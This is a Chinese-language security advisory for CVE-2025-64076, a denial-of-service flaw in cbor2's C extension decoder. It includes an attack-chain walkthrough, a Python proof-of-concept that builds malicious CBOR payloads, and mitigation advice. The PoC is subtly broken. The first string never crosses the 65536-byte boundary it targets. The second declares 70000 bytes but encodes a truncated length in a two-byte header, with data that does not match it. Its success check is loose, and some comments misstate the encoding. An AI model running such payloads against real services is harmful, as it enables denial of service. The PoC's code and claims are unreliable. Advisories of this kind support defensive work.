CVE-2025-64076 cbor2 C扩展解码器整数下溢与内存泄漏漏洞

漏洞信息

漏洞编号

CVE-2025-64076

漏洞类型

整数下溢/内存泄漏/拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

cbor2 (Python CBOR库)

漏洞概述

cbor2是一款流行的Python CBOR（Concise Binary Object Representation）编解码库。2025年11月，安全研究人员发现cbor2 5.7.0及之前版本在C扩展解码器（source/decoder.c）的decode_definite_long_string()函数中存在两个严重安全漏洞。第一个漏洞为整数下溢导致的越界读取（CWE-191、CWE-125），由于chunk处理循环中变量引用错误和状态重置缺失，导致buffer_length在UTF-8字符处理后未正确重置为零，后续计算的chunk_length会产生负值，被传递给read()方法时可能触发无限读取操作和资源耗尽。第二个漏洞为内存泄漏（CWE-401），主处理循环未释放每次迭代中分配的Python对象引用（Py_DECREF），对于超过65536字节的CBOR字符串，会造成与payload大小成比例的累积内存泄漏。攻击者可通过发送精心构造的CBOR数据（包含在65536字节边界处有多字节UTF-8字符的定长文本字符串）来远程利用这些漏洞，无需认证即可导致目标进程崩溃或内存耗尽，从而实现拒绝服务攻击。所有使用cbor2 C扩展处理不可信CBOR数据的应用都受影响，包括Web API、物联网数据采集器和消息队列处理器等。

技术细节

漏洞位于cbor2的C扩展解码器模块source/decoder.c中的decode_definite_long_string()函数。该函数负责解码CBOR定长长字符串，但在处理包含多字节UTF-8字符的数据时存在两个关键缺陷：

1. 整数下溢漏洞：在chunk处理循环中，当遇到跨越65536字节边界的UTF-8多字节字符时，buffer_length变量在字符消费后未被正确重置为0。这导致后续计算chunk_length = 65536 - buffer_length时产生负值。由于该值以有符号整数形式传递给read()方法，负值会被解释为极大的无符号值，从而触发无限读取操作和资源耗尽。攻击者只需构造一个定长文本字符串，使其多字节UTF-8字符恰好位于65536字节边界处，即可触发此漏洞。

2. 内存泄漏漏洞：主处理循环中，每次迭代分配的chunk对象引用未被正确释放（缺少Py_DECREF调用）。对于超过65536字节的CBOR字符串处理，每次迭代都会泄漏一个Python对象引用，造成累积性内存泄漏。攻击者可通过反复提交大尺寸CBOR payload来耗尽服务器内存。

两个漏洞均可通过网络远程利用，无需任何认证或用户交互，成功利用将导致进程崩溃（抛出CBORDecodeEOF异常）或内存耗尽。修复版本为5.7.1，修复提交为851473490281f82d82560b2368284ef33cf6e8f9。

攻击链分析

STEP 1

步骤1

攻击者识别目标应用，确认其使用cbor2库的C扩展（source/decoder.c）处理CBOR数据

STEP 2

步骤2

攻击者构造恶意CBOR payload，包含定长文本字符串，其多字节UTF-8字符位于65536字节边界处

STEP 3

步骤3

攻击者通过网络向目标应用发送精心构造的CBOR数据，无需任何认证

STEP 4

步骤4

cbor2 C扩展解码器decode_definite_long_string()函数处理payload时，由于变量引用错误，buffer_length未正确重置

STEP 5

步骤5

chunk_length计算产生负值整数下溢，被传递给read()方法后触发无限读取或内存泄漏

STEP 6

步骤6

目标进程因资源耗尽崩溃（CBORDecodeEOF异常）或内存耗尽，导致拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
PoC for CVE-2025-64076: cbor2 C Extension Decoder Integer Underflow and Memory Leak

This PoC demonstrates the vulnerability in cbor2's decode_definite_long_string()
function where improper handling of UTF-8 characters at 65536-byte chunk boundaries
causes integer underflow and memory leaks.

Affected: cbor2 <= 5.7.0
Fixed: cbor2 >= 5.7.1
"""

import struct
import sys

def create_malicious_cbor_payload():
    """
    Create a malicious CBOR payload that triggers integer underflow in
    decode_definite_long_string() when multi-byte UTF-8 characters are
    positioned at 65536-byte chunk boundaries.
    """
    payload = bytearray()
    
    # CBOR header for definite-length text string (Major type 3)
    # We need a string length that causes UTF-8 chars to span 65536 boundary
    # Target: 65535 bytes + 1 continuation byte at boundary
    
    # 65535 = 0xFFFF, encoded as 0x1A 0x00 0xFF 0xFF (32-bit uint)
    header = bytes([0x79, 0xFF, 0xFF])  # text string, length 65535
    
    # First 65532 bytes of ASCII data
    payload.extend(b'A' * 65532)
    
    # Add 3-byte UTF-8 character (e.g., € which is 0xE2 0x82 0xAC)
    # This will cause buffer_length to not be properly reset at boundary
    payload.extend(b'\xe2\x82\xac')  # 3-byte UTF-8 character
    
    # Prepend CBOR header
    full_payload = header + bytes(payload)
    
    return bytes(full_payload)


def create_large_cbor_for_memory_leak():
    """
    Create a large CBOR payload to demonstrate memory leak.
    For strings > 65536 bytes, each chunk leaks Python object references.
    """
    # Create CBOR with large definite-length string (> 65536 bytes)
    payload = bytearray()
    
    # Header: text string with length > 65536
    # 70000 = 0x00011170, use 3-byte encoding
    length = 70000
    header = bytes([0x79, (length >> 8) & 0xFF, length & 0xFF])
    
    # Fill with data containing UTF-8 characters at chunk boundaries
    payload.extend(b'B' * 65534)
    payload.extend(b'\xe2\x82\xac')  # UTF-8 char at boundary
    payload.extend(b'C' * (length - 65536))
    
    return header + bytes(payload)


def test_vulnerability():
    """Test if the cbor2 library is vulnerable"""
    try:
        import cbor2
        print(f"[+] cbor2 version: {cbor2.__version__}")
    except ImportError:
        print("[-] cbor2 not installed. Install with: pip install cbor2")
        print("    Note: Install version <= 5.7.0 to test vulnerability")
        return False
    
    # Check if using C extension (vulnerable path)
    try:
        from cbor2 import CBORDecoder
        from io import BytesIO
        
        # Test 1: Integer underflow PoC
        print("\n[*] Test 1: Testing integer underflow vulnerability...")
        try:
            malicious_payload = create_malicious_cbor_payload()
            decoder = CBORDecoder(BytesIO(malicious_payload))
            result = decoder.decode()
            print(f"[!] Unexpected: Decoding succeeded, result length: {len(result)}")
        except Exception as e:
            print(f"[!] Exception caught: {type(e).__name__}: {e}")
            if "memory" in str(e).lower() or "decode" in str(e).lower():
                print("[+] Vulnerability triggered - integer underflow detected")
        
        # Test 2: Memory leak demonstration
        print("\n[*] Test 2: Testing memory leak vulnerability...")
        print("    Note: Monitor memory usage during decoding")
        try:
            large_payload = create_large_cbor_for_memory_leak()
            decoder = CBORDecoder(BytesIO(large_payload))
            result = decoder.decode()
            print(f"[!] Decoded successfully, length: {len(result)}")
        except Exception as e:
            print(f"[!] Exception: {type(e).__name__}: {e}")
        
        return True
        
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    print("=" * 70)
    print("CVE-2025-64076 PoC - cbor2 Integer Underflow and Memory Leak")
    print("=" * 70)
    print("\nVulnerability Description:")
    print("  - Integer underflow in decode_definite_long_string()")
    print("  - Memory leak due to missing Py_DECREF calls")
    print("  - Both can cause denial of service\n")
    
    test_vulnerability()
    
    print("\n" + "=" * 70)
    print("Remediation: Upgrade to cbor2 >= 5.7.1")
    print("Commit: 851473490281f82d82560b2368284ef33cf6e8f9")
    print("=" * 70)

影响范围

cbor2 <= 5.7.0

防御指南

临时缓解措施

立即将cbor2库升级到5.7.1或更高版本。对于无法立即升级的场景，可以采取以下临时缓解措施：1) 在应用层对所有CBOR输入进行长度验证和过滤；2) 限制单次CBOR解码的最大数据量；3) 对处理不可信CBOR数据的服务启用资源限制和监控；4) 考虑使用Python版解码器替代C扩展以规避漏洞，但需注意性能影响。建议同时检查GitHub仓库agronholm/cbor2的issues #264和pull request #265获取更多修复细节。